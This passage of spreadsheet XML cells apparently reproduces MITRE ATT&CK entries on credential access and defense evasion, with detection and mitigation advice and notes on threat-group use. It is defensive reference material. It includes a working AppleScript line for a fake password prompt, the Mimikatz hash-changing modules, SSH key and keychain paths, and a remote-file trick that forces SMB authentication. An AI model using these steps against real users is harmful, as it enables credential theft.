    <t>When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task. Adversaries can mimic this functionality to prompt users for credentials with a normal-looking prompt. This type of prompt can be accomplished with AppleScript:
&lt;code&gt;set thePassword to the text returned of (display dialog "AdobeUpdater needs permission to check for updates. Please authenticate." default answer "")&lt;/code&gt;
[[CiteRef::OSX Keydnap malware]]
Adversaries can prompt a user for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.[[CiteRef::OSX Malware Exploits MacKeeper]]</t>
  </si>
  <si>
    <t>User interface,Process Monitoring</t>
  </si>
  <si>
    <t>This technique exploits users' tendencies to always supply credentials when prompted, which makes it very difficult to detect. Monitor process execution for unusual programs as well as AppleScript that could be used to prompt users for credentials. ,</t>
  </si>
  <si>
    <t>Users need to be trained to know which programs ask for permission and why. Follow mitigation recommendations for [[Technique/T1155|AppleScript]].</t>
  </si>
  <si>
    <t>macOS</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1141</t>
  </si>
  <si>
    <t>Account Manipulation</t>
  </si>
  <si>
    <t>The [[Software/S0002|Mimikatz]] credential dumper has been extended to include Skeleton Key domain controller authentication bypass functionality.[[CiteRef::Metcalf 2015]] The &lt;code&gt;LSADUMP::ChangeNTLM&lt;/code&gt; and &lt;code&gt;LSADUMP::SetNTLM&lt;/code&gt; modules can also manipulate the password hash of an account without knowing the clear text value.[[CiteRef::Adsecurity Mimikatz Guide]]</t>
  </si>
  <si>
    <t>Authentication logs,API monitoring,Windows event logs,Packet capture</t>
  </si>
  <si>
    <t>Collect events that correlate with changes to account objects on systems and the domain, such as event ID 4738.[[CiteRef::Microsoft User Modified Event]] Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ[[CiteRef::InsiderThreat ChangeNTLM July 2017]] or that include additional flags such as changing a password without knowledge of the old password.[[CiteRef::GitHub Mimikatz Issue 92 June 2017]]
Use of credentials may also occur at unusual times or to unusual systems or services and may correlate with other suspicious activity. ,</t>
  </si>
  <si>
    <t>Use multifactor authentication. Follow guidelines to prevent or limit adversary access to [[Technique/T1078|Valid Accounts]].
Protect domain controllers by ensuring proper security configuration for critical servers. Configure access controls and firewalls to limit access to these systems. Do not allow domain administrator accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.</t>
  </si>
  <si>
    <t>Administrator</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1098</t>
  </si>
  <si>
    <t>Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.[[CiteRef::Wikipedia Public Key Crypto]]
Adversaries may gather private keys from compromised systems for use in authenticating to [[Technique/T1021|Remote Services]] like SSH or for use in decrypting other collected files such as email. Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, pfx, .cer, .p7b, .asc. Adversaries may also look in common key directories, such as &lt;code&gt;~/.ssh&lt;/code&gt; for SSH keys on *nix-based systems or &lt;code&gt;C:\Users\(username)\.ssh\&lt;/code&gt; on Windows.
Private keys should require a password or passphrase for operation, so an adversary may also use [[Technique/T1056|Input Capture]] for keylogging or attempt to [[Technique/T1110|Brute Force]] the passphrase off-line.
Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates.[[CiteRef::Kaspersky Careto]][[CiteRef::Palo Alto Prince of Persia]]</t>
  </si>
  <si>
    <t>The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. [[CiteRef::Wikipedia Server Message Block]] This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources. Web Distributed Authoring and Versioning (WebDAV) is typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443.[[CiteRef::Didier Stevens WebDAV Traffic]][[CiteRef::Microsoft Managing WebDAV Security]]
Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary, or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information including the user's hashed credentials over SMB to the adversary controlled server.[[CiteRef::GitHub Hashjacking]] With access to the credential hash, an adversary can perform off-line [[Technique/T1110|Brute Force]] cracking to gain access to plaintext credentials, or reuse it for [[Technique/T1075|Pass the Hash]].[[CiteRef::Cylance Redirect to SMB]]
There are different ways this can occur:
*A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened. The document can include, for example, a request similar to &lt;code&gt;file[:]//[remote address]/Normal.dotm&lt;/code&gt; to trigger the SMB request.[[CiteRef::US-CERT APT Energy Oct 2017]]
*A modified .LNK or .SCF file with the icon filename pointing to an external reference such as &lt;code&gt;\\[remote address]\pic.png&lt;/code&gt; that will force the system to load the resource when the icon is rendered to repeatedly gather credentials.[[CiteRef::US-CERT APT Energy Oct 2017]]</t>
  </si>
  <si>
    <t>Network Sniffing</t>
  </si>
  <si>
    <t>captures hashes and credentials that are sent to the system after the name services have been poisoned.[[CiteRef::GitHub Responder]]</t>
  </si>
  <si>
    <t>Network device logs,Host network interface,Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>Detecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would likely need to perform a man-in-the-middle attack against other devices on a wired network in order to capture traffic that was not to or from the current compromised system. This change in the flow of information is detectable at the enclave network level. Monitor for ARP spoofing and gratuitous ARP broadcasts. Detecting compromised network devices is a bit more challenging. Auditing administrator logins, configuration changes, and device images is required to detect malicious changes. ,</t>
  </si>
  <si>
    <t>Ensure that all wireless traffic is encrypted appropriately. Use Kerberos, SSL, and multifactor authentication wherever possible. Monitor switches and network for span port usage, ARP/DNS poisoning, and router reconfiguration.
Identify and block potentially malicious software that may be used to sniff or analyze network traffic by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Network interface access and packet capture driver</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1040</t>
  </si>
  <si>
    <t>Keychain</t>
  </si>
  <si>
    <t>Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in &lt;code&gt;~/Library/Keychains/&lt;/code&gt;,&lt;code&gt;/Library/Keychains/&lt;/code&gt;, and &lt;code&gt;/Network/Library/Keychains/&lt;/code&gt;.[[CiteRef::Wikipedia keychain]] The &lt;code&gt;security&lt;/code&gt; command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.
To manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault.[[CiteRef::External to DA, the OS X Way]] By default, the passphrase for the keychain is the user?s logon credentials.</t>
  </si>
  <si>
    <t>System calls,Process Monitoring</t>
  </si>
  <si>
    <t>Unlocking the keychain and using passwords from it is a very common process, so there is likely to be a lot of noise in any detection technique. Monitoring of system calls to the keychain can help determine if there is a suspicious process trying to access it. ,</t>
  </si>
  <si>
    <t>The password for the user's login keychain can be changed from the user's login password. This increases the complexity for an adversary because they need to know an additional password.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1142</t>
  </si>
  <si>
    <t>[[Group/G0007|APT28]] deployed the open source tool Responder to conduct NetBIOS Name Service poisoning, which captured usernames and hashed passwords that allowed access to legitimate credentials.[[CiteRef::FireEye APT28 Hospitality Aug 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0032|Lazarus Group]] malware WhiskeyDelta-Two contains a function that attempts to rename the administrator?s account.[[CiteRef::Novetta Blockbuster Destructive Malware]]</t>
  </si>
  <si>
    <t>Credentials in Files</t>
  </si>
  <si>
    <t>[[Software/S0002|Mimikatz]]'s &lt;code&gt;DPAPI&lt;/code&gt; module can harvest protected credentials stored and/or cached by browsers and other user applications by interacting with Windows cryptographic application programming interface (API) functions.[[CiteRef::Adsecurity Mimikatz Guide]][[CiteRef::Directory Services Internals DPAPI Backup Keys Oct 2015]]</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [[Technique/T1078|Valid Accounts]] for more information. ,</t>
  </si>
  <si>
    <t>Establish an organizational policy that prohibits password storage in files. Ensure that developers and system administrators are aware of the risk associated with having plaintext passwords in software configuration files that may be left on endpoint systems or servers. Preemptively search for files containing passwords and remove when found. Restrict file shares to specific directories with access only to necessary users. Remove vulnerable Group Policy Preferences.[[CiteRef::Microsoft MS14-025]]</t>
  </si>
  <si>
    <t>User,Administrator,SYSTEM</t>
  </si>
  <si>
    <t>Access to files</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1081</t>
  </si>
  <si>
    <t>Securityd Memory</t>
  </si>
  <si>
    <t>In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple?s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords.[[CiteRef::OS X Keychain]][[CiteRef::External to DA, the OS X Way]] Apple?s securityd utility takes the user?s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user?s password, but once the master key is found, an attacker need only iterate over the other values to unlock the final password.[[CiteRef::OS X Keychain]]
If an adversary can obtain root access (allowing them to read securityd?s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user?s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.[[CiteRef::OS X Keychain]][[CiteRef::OSX Keydnap malware]]</t>
  </si>
  <si>
    <t>Process Monitoring</t>
  </si>
  <si>
    <t>,</t>
  </si>
  <si>
    <t>root</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1167</t>
  </si>
  <si>
    <t>[[Software/S0089|BlackEnergy]] has used a plug-in to gather credentials stored in files on the host by various software programs, including The Bat! email client, Mozilla password manager, Google Chrome password manager, Outlook, Internet Explorer, and Windows Credential Store.[[CiteRef::F-Secure BlackEnergy 2014]][[CiteRef::Securelist BlackEnergy Nov 2014]]</t>
  </si>
  <si>
    <t>If an initial connectivity check fails, [[Software/S0067|pngdowner]] attempts to extract proxy details and credentials from Windows Protected Storage and from the IE Credentials Store. This allows the adversary to use the proxy credentials for subsequent requests if they enable outbound HTTP access.[[CiteRef::CrowdStrike Putter Panda]]</t>
  </si>
  <si>
    <t>Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name.[[CiteRef::Wikipedia LLMNR]][[CiteRef::TechNet NetBIOS]]
Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [[Technique/T1040|Network Sniffing]] and crack the hashes offline through [[Technique/T1110|Brute Force]] to obtain the plaintext passwords.
Several tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [[Software/S0174|Responder]].[[CiteRef::GitHub NBNSpoof]][[CiteRef::Rapid7 LLMNR Spoofer]][[CiteRef::GitHub Responder]]</t>
  </si>
  <si>
    <t>Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as dynamic link libraries (DLLs) containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts.
Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation.
Adversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.[[CiteRef::Carnal Ownage Password Filters Sept 2013]]</t>
  </si>
  <si>
    <t>[[Group/G0007|APT28]] has been known to specifically look for Firefox passwords on the file system [[CiteRef::XAgentOSX]]</t>
  </si>
  <si>
    <t>[[Software/S0161|XAgentOSX]] contains the getFirefoxPassword function to attempt to locate Firefox passwords.[[CiteRef::XAgentOSX]]</t>
  </si>
  <si>
    <t>[[Software/S0117|XTunnel]] is capable of accessing locally stored passwords on victims.[[CiteRef::Invincea XTunnel]]</t>
  </si>
  <si>
    <t>[[Group/G0022|APT3]] has a tool that can locate credentials in files on the file system such as those from Firefox or Chrome. [[CiteRef::Symantec Buckeye]]</t>
  </si>
  <si>
    <t>Two-Factor Authentication Interception</t>
  </si>
  <si>
    <t>Use of two- or multifactor authentication is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. Adversaries may target authentication mechanisms, such as smart cards, to gain access to systems, services, and network resources.
If a smart card is used for two-factor authentication (2FA), then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token.[[CiteRef::Mandiant M Trends 2011]]
Other methods of 2FA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors.[[CiteRef::Operation Emmental]]
Other hardware tokens, such as RSA SecurID, require the adversary to have access to the physical device or the seed and algorithm in addition to the corresponding credentials.</t>
  </si>
  <si>
    <t>Detecting use of proxied smart card connections by an adversary may be difficult because it requires the token to be inserted into a system; thus it is more likely to be in use by a legitimate user and blend in with other network behavior. ,</t>
  </si>
  <si>
    <t>Remove smart cards when not in use. Protect devices and services used to transmit and receive out-of-band codes.
Identify and block potentially malicious software that may be used to intercept 2FA credentials on a system by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Smart card Proxy: Use of smart cards for single or multifactor authentication to access to network resources. Attached smart card reader with card inserted.
Out-of-band one-time code: Access to the device, service, or communications to intercept the one-time code.
Hardware token: Access to the seed and algorithm of generating one-time codes.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1111</t>
  </si>
  <si>
    <t>Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.
User credentials may be sent over an insecure, unencrypted protocol that can be captured and obtained through network packet analysis. An adversary may place a network interface into promiscuous mode, using a utility to capture traffic in transit over the network or use span ports to capture a larger amount of data. In addition, techniques for name service resolution poisoning, such as [[Technique/T1171|LLMNR/NBT-NS Poisoning]], can be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.</t>
  </si>
  <si>
    <t>Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained.
[[Technique/T1003|Credential Dumping]] to obtain password hashes may only get an adversary so far when [[Technique/T1075|Pass the Hash]] is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table. Cracking hashes is usually done on adversary-controlled systems outside of the target network.[[CiteRef::Wikipedia Password cracking]]
Adversaries may attempt to brute force logins without knowledge of passwords or hashes during an operation either with zero knowledge or by attempting a list of known or possible passwords. This is a riskier option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.[[CiteRef::Cylance Cleaver]]
A related technique called password spraying uses one password, or a small list of passwords, that matches the complexity policy of the domain and may be a commonly used password. Logins are attempted with that password and many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords.[[CiteRef::BlackHillsInfosec Password Spraying]]</t>
  </si>
  <si>
    <t>Account manipulation may aid adversaries in maintaining access to credentials and certain permission levels within an environment. Manipulation could consist of modifying permissions, modifying credentials, adding or changing permission groups, modifying account settings, or modifying how authentication is performed. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.</t>
  </si>
  <si>
    <t>Adversaries may search local file systems and remote file shares for files containing passwords.  These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
It is possible to extract passwords from backups or saved virtual machines through [[Technique/T1003|Credential Dumping]].[[CiteRef::CG 2014]] Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller.[[CiteRef::SRD GPP]]</t>
  </si>
  <si>
    <t>[[Group/G0006|APT1]] has been known to use credential dumping.[[CiteRef::Mandiant APT1]]</t>
  </si>
  <si>
    <t>Credential Access,Defense Evasion,Lateral Movement,Privilege Escalation</t>
  </si>
  <si>
    <t>Exploitation of Vulnerability</t>
  </si>
  <si>
    <t>Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Exploiting software vulnerabilities may allow adversaries to run a command or binary on a remote system for lateral movement, escalate a current process to a higher privilege level, or bypass security mechanisms. Exploits may also allow an adversary access to privileged accounts and credentials. One example of this is MS14-068, which can be used to forge Kerberos tickets using domain user permissions.[[CiteRef::Technet MS14-068]][[CiteRef::ADSecurity Detecting Forged Tickets]]</t>
  </si>
  <si>
    <t>Windows Error Reporting,File monitoring,Process monitoring</t>
  </si>
  <si>
    <t>Anti-virus,System access controls</t>
  </si>
  <si>
    <t>Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Software and operating system crash reports may contain useful contextual information about attempted exploits that correlate with other malicious activity. Exploited processes may exhibit behavior that is unusual for the specific process, such as spawning additional processes or reading and writing to files. ,</t>
  </si>
  <si>
    <t>Update software regularly by employing patch management for internal enterprise endpoints and servers. Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization. Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing, virtualization, and exploit prevention tools such as the Microsoft Enhanced Mitigation Experience Toolkit.[[CiteRef::SRD EMET]]</t>
  </si>
  <si>
    <t>Unpatched software or otherwise vulnerable target. Depending on the target and goal, the system and exploitable service may need to be remotely accessible from the internal network. In the case of privilege escalation, the adversary likely already has user permissions on the target system.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1068</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]] can exploit vulnerabilities such as MS14-058.[[CiteRef::Cobalt Strike TTPs Dec 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0050|APT32]] has used CVE-2016-7255 to escalate privileges.[[CiteRef::FireEye APT32 May 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0027|Threat Group-3390]] has used CVE-2014-6324 to escalate privileges.[[CiteRef::SecureWorks BRONZE UNION June 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0125|Remsec]] has a plugin to drop and execute vulnerable Outpost Sandbox or avast! Virtualization drivers in order to gain kernel mode privileges.[[CiteRef::Kaspersky ProjectSauron Technical Analysis]]</t>
  </si>
  <si>
    <t>[[Group/G0037|FIN6]] has used tools to exploit Windows vulnerabilities in order to escalate privileges. The tools targeted CVE-2013-3660, CVE-2011-2005, and CVE-2010-4398, all of which could allow local users to access kernel-level privileges.[[CiteRef::FireEye FIN6 April 2016]]</t>
  </si>
  <si>
    <t>NEODYMIUM</t>
  </si>
  <si>
    <t>NEODYMIUM ,</t>
  </si>
  <si>
    <t>G0055</t>
  </si>
  <si>
    <t>Software: Wingbird</t>
  </si>
  <si>
    <t>exploits CVE-2016-4117 to allow an executable to gain escalated privileges.[[CiteRef::Microsoft SIR Vol 21]]</t>
  </si>
  <si>
    <t>[[Group/G0007|APT28]] has used CVE-2014-4076, CVE-2015-2387, and CVE-2015-1701 to escalate privileges, as well as CVE-2015-4902 to bypass security features.[[CiteRef::Bitdefender APT28 Dec 2015]][[CiteRef::Microsoft SIR Vol 19]]</t>
  </si>
  <si>
    <t>[[Software/S0044|JHUHUGIT]] has exploited CVE-2015-1701 and CVE-2015-2387 to escalate privileges.[[CiteRef::ESET Sednit Part 1]][[CiteRef::ESET Sednit July 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0050|CosmicDuke]] attempts to exploit privilege escalation vulnerabilities CVE-2010-0232 or CVE-2010-4398.[[CiteRef::F-Secure The Dukes]]</t>
  </si>
  <si>
    <t>[[Group/G0007|APT28]] exploited a Windows SMB Remote Code Execution Vulnerability to conduct lateral movement.[[CiteRef::FireEye APT28 Hospitality Aug 2017]][[CiteRef::MS17-010 March 2017]]</t>
  </si>
  <si>
    <t>Credential Access,Persistence,Privilege Escalation</t>
  </si>
  <si>
    <t>Hooking</t>
  </si>
  <si>
    <t>Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. Hooking involves redirecting calls to these functions and can be implemented via:
* '''Hooks procedures''', which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.[[CiteRef::Microsoft Hook Overview]][[CiteRef::Engame Process Injection July 2017]]
* '''Import address table (IAT) hooking''', which use modifications to a process?s IAT, where pointers to imported API functions are stored.[[CiteRef::Engame Process Injection July 2017]][[CiteRef::Adlice Software IAT Hooks Oct 2014]][[CiteRef::MWRInfoSecurity Dynamic Hooking 2015]]
* '''Inline hooking''', which overwrites the first bytes in an API function to redirect code flow.[[CiteRef::Engame Process Injection July 2017]][[CiteRef::HighTech Bridge Inline Hooking Sept 2011]][[CiteRef::MWRInfoSecurity Dynamic Hooking 2015]]
Similar to [[Technique/T1055|Process Injection]], adversaries may use hooking to load and execute malicious code within the context of another process, masking the execution while also allowing access to the process's memory and possibly elevated privileges. Installing hooking mechanisms may also provide [[Persistence]] via continuous invocation when the functions are called through normal use.
Malicious hooking mechanisms may also capture API calls that include parameters that reveal user authentication credentials for [[Credential Access]].[[CiteRef::Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017]]
Hooking is commonly utilized by [[Technique/T1014|Rootkit]]s to conceal files,
processes, Registry keys, and other objects in order to hide malware and associated behaviors.[[CiteRef::Symantec Windows Rootkits]]</t>
  </si>
  <si>
    <t>API monitoring,Binary file metadata,DLL monitoring,Loaded DLLs,Process Monitoring,Windows event logs</t>
  </si>
  <si>
    <t>Monitor for calls to the SetWindowsHookEx and SetWinEventHook functions, which install a hook procedure.[[CiteRef::Microsoft Hook Overview]][[CiteRef::Volatility Detecting Hooks Sept 2012]] Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools [[CiteRef::Volatility Detecting Hooks Sept 2012]][[CiteRef::PreKageo Winhook Jul 2011]][[CiteRef::Jay GetHooks Sept 2011]] or by programmatically examining internal kernel structures.[[CiteRef::Zairon Hooking Dec 2006]][[CiteRef::EyeofRa Detecting Hooking June 2017]]
Rootkits detectors [[CiteRef::GMER Rootkits]] can also be used to monitor for various flavors of hooking activity.
Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes [[CiteRef::Microsoft Process Snapshot]] to compare the in-memory IAT to the real addresses of the referenced functions.[[CiteRef::StackExchange Hooks Jul 2012]][[CiteRef::Adlice Software IAT Hooks Oct 2014]]
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ,</t>
  </si>
  <si>
    <t>This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating all hooking will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1179</t>
  </si>
  <si>
    <t>Defense Evasion</t>
  </si>
  <si>
    <t>File Deletion</t>
  </si>
  <si>
    <t>[[Software/S0067|pngdowner]] deletes content from C2 communications that was saved to the user's temporary directory.[[CiteRef::CrowdStrike Putter Panda]]</t>
  </si>
  <si>
    <t>Binary file metadata,File monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Host forensic analysis</t>
  </si>
  <si>
    <t>It may be uncommon for events related to benign command-line functions such as DEL or third-party utilities or tools to be found in an environment, depending on the user base and how systems are typically used. Monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce. Some monitoring tools may collect command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe. ,</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to delete files,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</si>
  <si>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https://attack.mitre.org/wiki/Technique/T1107</t>
  </si>
  <si>
    <t>[[Software/S0148|RTM]] can delete all files created during its execution.[[CiteRef::ESET RTM Feb 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0032|gh0st]] RAT is able to delete files.[[CiteRef::FireEye Hacking Team]]</t>
  </si>
  <si>
    <t>deletes its payload along with the payload's parent process after it finishes copying files.[[CiteRef::Microsoft SIR Vol 21]]</t>
  </si>
  <si>
    <t>[[Group/G0049|OilRig]]'s TwoFace Web shell uses &lt;code&gt;del&lt;/code&gt; to delete a text file of passwords after reading it.[[CiteRef::Unit42 Webshell July 2017]]</t>
  </si>
  <si>
    <t>Disabling Security Tools</t>
  </si>
  <si>
    <t>[[Software/S0108|netsh]] can be used to disable local firewall settings.[[CiteRef::TechNet Netsh Firewall]]</t>
  </si>
  <si>
    <t>API monitoring,Anti-virus,File monitoring,Services,Windows Registry,Process command-line parameters</t>
  </si>
  <si>
    <t>Anti-virus,File monitoring,Host intrusion prevention systems,Signature-based detection,Log analysis</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if security tools are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log or event file reporting may be suspicious. ,</t>
  </si>
  <si>
    <t>Ensure proper process, registry, and file permissions are in place to prevent adversaries from disabling or interfering with security services.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1089</t>
  </si>
  <si>
    <t>[[Software/S0089|BlackEnergy]] 2 contains a "Destroy" plug-in that destroys data stored on victim hard drives by overwriting file contents.[[CiteRef::Securelist BlackEnergy Feb 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0168|Gazer]] has commands to delete files and persistence mechanisms from the victim.[[CiteRef::ESET Gazer Aug 2017]][[CiteRef::Securelist WhiteBear Aug 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0070|HTTPBrowser]] deletes its original installer file once installation is complete.[[CiteRef::ZScaler Hacking Team]]</t>
  </si>
  <si>
    <t>[[Group/G0027|Threat Group-3390]] has deleted existing logs and exfiltrated file archives from a victim.[[CiteRef::SecureWorks BRONZE UNION June 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0125|Remsec]] is capable of deleting files on the victim.[[CiteRef::Symantec Remsec IOCs]][[CiteRef::Kaspersky ProjectSauron Technical Analysis]] It also securely removes itself after collecting and exfiltrating data.[[CiteRef::Kaspersky ProjectSauron Full Report]]</t>
  </si>
  <si>
    <t>[[Software/S0058|SslMM]] identifies and kills anti-malware processes.[[CiteRef::Baumgartner Naikon 2015]]</t>
  </si>
  <si>
    <t>Software: HDoor, Custom HDoor</t>
  </si>
  <si>
    <t>[[Software/S0061|HDoor]] kills anti-virus found on the victim.[[CiteRef::Baumgartner Naikon 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0106|cmd]] can be used to delete files from the file system.[[CiteRef::TechNet Del]]</t>
  </si>
  <si>
    <t>[[Group/G0053|FIN5]] uses SDelete to clean up the environment and attempt to prevent detection.[[CiteRef::Mandiant FIN5 GrrCON Oct 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0151|HALFBAKED]] can delete a specified file.[[CiteRef::FireEye FIN7 April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0021|Derusbi]] is capable of deleting files. It has been observed loading a Linux Kernel Module (LKM) and then deleting it from the hard disk as well as overwriting the data with null bytes.[[CiteRef::Fidelis Turbo]]</t>
  </si>
  <si>
    <t>[[Group/G0051|FIN10]] has used batch scripts and scheduled tasks to delete critical system files.[[CiteRef::FireEye FIN10 June 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0035|Dragonfly]] deleted a file immediately after executing it on a victim host.[[CiteRef::US-CERT APT Energy Oct 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0093|Backdoor.Oldrea]] contains a cleanup module that removes traces of itself from the victim.[[CiteRef::Symantec Dragonfly]]</t>
  </si>
  <si>
    <t>[[Software/S0083|Misdat]] is capable of deleting the backdoor file.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>[[Group/G0059|Magic Hound]] malware can delete files.[[CiteRef::Unit 42 Magic Hound Feb 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0153|RedLeaves]] can delete specified files.[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]]</t>
  </si>
  <si>
    <t>DLL Side-Loading</t>
  </si>
  <si>
